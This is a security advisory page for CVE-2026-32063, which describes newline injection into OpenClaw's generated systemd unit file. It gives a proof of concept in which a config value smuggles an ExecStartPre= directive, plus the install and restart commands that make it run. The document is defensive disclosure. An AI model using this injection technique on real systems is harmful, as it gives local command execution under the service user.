GHSA-VFFC-F7R7-RX2W

Vulnerability from github – Published: 2026-03-03 21:52 – Updated: 2026-03-16 21:51
VLAI?
Summary
OpenClaw Improperly Neutralizes Line Breaks in systemd Unit Generation Enables Local Command Execution (Linux)
Details

Summary

A command injection vulnerability exists in OpenClaw’s Linux systemd unit generation path. When rendering Environment= entries, attacker-controlled values are not rejected for CR/LF, and systemdEscapeArg() uses an incorrect whitespace-matching regex. This allows newline injection to break out of an Environment= line and inject standalone systemd directives (for example, ExecStartPre=). On service restart, the injected command is executed, resulting in local arbitrary command execution (local RCE) under the gateway service user.

Details

The issue is in src/daemon/systemd-unit.ts:

  • renderEnvLines(...) builds:
  • Environment=${systemdEscapeArg(${key}=${value})}
  • No CR/LF validation is enforced for environment keys/values before writing unit lines.
  • systemdEscapeArg(...) uses:
  • /[\\s"\\\\]/
  • In this regex, \\s is interpreted as a literal backslash + s, not a whitespace character class. As a result, whitespace detection/quoting behavior is incorrect. Because systemd parses unit files line-by-line, a newline inside an environment value can inject an additional directive line. Example rendered output:
Environment=INJECT=ok
ExecStartPre=/bin/touch /tmp/oc15789_rce

At restart time, systemd executes ExecStartPre, enabling command execution.

Relevant code path/components involved in exploitation chain: - src/daemon/systemd-unit.ts - src/commands/daemon-install-helpers.ts - src/config/env-vars.ts - src/config/zod-schema.ts

Trigger conditions: 1. Attacker can influence config.env.vars (directly or indirectly). 2. Install/reinstall path is invoked to write/update the unit. 3. Service restart occurs (systemctl --user restart ...).

PoC

Environment: Linux host with systemd user services enabled.

  1. Configure a malicious environment value in OpenClaw config (config.env.vars), including a newline and injected directive:
  2. Key: INJECT
  3. Value:
ok
ExecStartPre=/bin/touch /tmp/oc15789_rce
  1. Install/reinstall the gateway service (fixed port as requested):
openclaw gateway install --port 15789 --force
  1. Inspect the generated user unit file (default path):
~/.config/systemd/user/openclaw-gateway.service

Verify that an injected standalone line exists:

ExecStartPre=/bin/touch /tmp/oc15789_rce
  1. Reload and restart user service:
systemctl --user daemon-reload

systemctl --user restart openclaw-gateway.service
  1. Confirm command execution side effect:
ls -l /tmp/oc15789_rce

Impact

This is a local command execution vulnerability in OpenClaw’s systemd unit generation during install/reinstall flows.

  • Type: Command injection via newline/directive injection in unit file generation.
  • Execution context: Runs with the same privileges as the OpenClaw gateway service user.
  • Affected users: Linux deployments using systemd user services where an attacker can control config.env.vars and trigger install/reinstall.

Fix Commit(s)

  • 61f646c41fb43cd87ed48f9125b4718a30d38e84
Severity ?
8.6 (High)
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2026.2.19-2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.2.21"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32063"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-03T21:52:54Z",
    "nvd_published_at": "2026-03-11T14:16:28Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA command injection vulnerability exists in OpenClaw\u2019s Linux systemd unit generation path.\nWhen rendering `Environment=` entries, attacker-controlled values are not rejected for CR/LF, and `systemdEscapeArg()` uses an incorrect whitespace-matching regex. This allows newline injection to break out of an `Environment=` line and inject standalone systemd directives (for example, `ExecStartPre=`). On service restart, the injected command is executed, resulting in local arbitrary command execution (local RCE) under the gateway service user.\n\n---\n\n### Details\nThe issue is in `src/daemon/systemd-unit.ts`:\n\n- `renderEnvLines(...)` builds:\n- `Environment=${systemdEscapeArg(`${key}=${value}`)}`\n- No CR/LF validation is enforced for environment keys/values before writing unit lines.\n- `systemdEscapeArg(...)` uses:\n- `/[\\\\s\"\\\\\\\\]/`\n- In this regex, `\\\\s` is interpreted as a literal backslash + `s`, not a whitespace character class.\nAs a result, whitespace detection/quoting behavior is incorrect.\nBecause systemd parses unit files line-by-line, a newline inside an environment value can inject an additional directive line. Example rendered output:\n\n```ini\nEnvironment=INJECT=ok\nExecStartPre=/bin/touch /tmp/oc15789_rce\n```\n\nAt restart time, systemd executes `ExecStartPre`, enabling command execution.\n\nRelevant code path/components involved in exploitation chain:\n- `src/daemon/systemd-unit.ts`\n- `src/commands/daemon-install-helpers.ts`\n- `src/config/env-vars.ts`\n- `src/config/zod-schema.ts`\n\nTrigger conditions:\n1. Attacker can influence `config.env.vars` (directly or indirectly).\n2. Install/reinstall path is invoked to write/update the unit.\n3. Service restart occurs (`systemctl --user restart ...`).\n\n---\n\n### PoC\nEnvironment: Linux host with systemd user services enabled.\n\n1. Configure a malicious environment value in OpenClaw config (`config.env.vars`), including a newline and injected directive:\n- Key: `INJECT`\n- Value:\n```text\nok\nExecStartPre=/bin/touch /tmp/oc15789_rce\n```\n\n2. Install/reinstall the gateway service (fixed port as requested):\n```bash\nopenclaw gateway install --port 15789 --force\n```\n\n3. Inspect the generated user unit file (default path):\n```bash\n~/.config/systemd/user/openclaw-gateway.service\n```\nVerify that an injected standalone line exists:\n```ini\nExecStartPre=/bin/touch /tmp/oc15789_rce\n```\n\n4. Reload and restart user service:\n```bash\nsystemctl --user daemon-reload\n```\n```bash\nsystemctl --user restart openclaw-gateway.service\n```\n\n5. Confirm command execution side effect:\n```bash\nls -l /tmp/oc15789_rce\n```\n---\n\n### Impact\nThis is a local command execution vulnerability in OpenClaw\u2019s systemd unit generation during install/reinstall flows.\n\n- **Type:** Command injection via newline/directive injection in unit file generation.\n- **Execution context:** Runs with the same privileges as the OpenClaw gateway service user.\n- **Affected users:** Linux deployments using systemd user services where an attacker can control `config.env.vars` and trigger install/reinstall.\n\n## Fix Commit(s)\n- `61f646c41fb43cd87ed48f9125b4718a30d38e84`",
  "id": "GHSA-vffc-f7r7-rx2w",
  "modified": "2026-03-16T21:51:52Z",
  "published": "2026-03-03T21:52:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vffc-f7r7-rx2w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32063"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/61f646c41fb43cd87ed48f9125b4718a30d38e84"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-command-injection-via-newline-in-systemd-unit-generation"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw Improperly Neutralizes Line Breaks in systemd Unit Generation Enables Local Command Execution (Linux)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.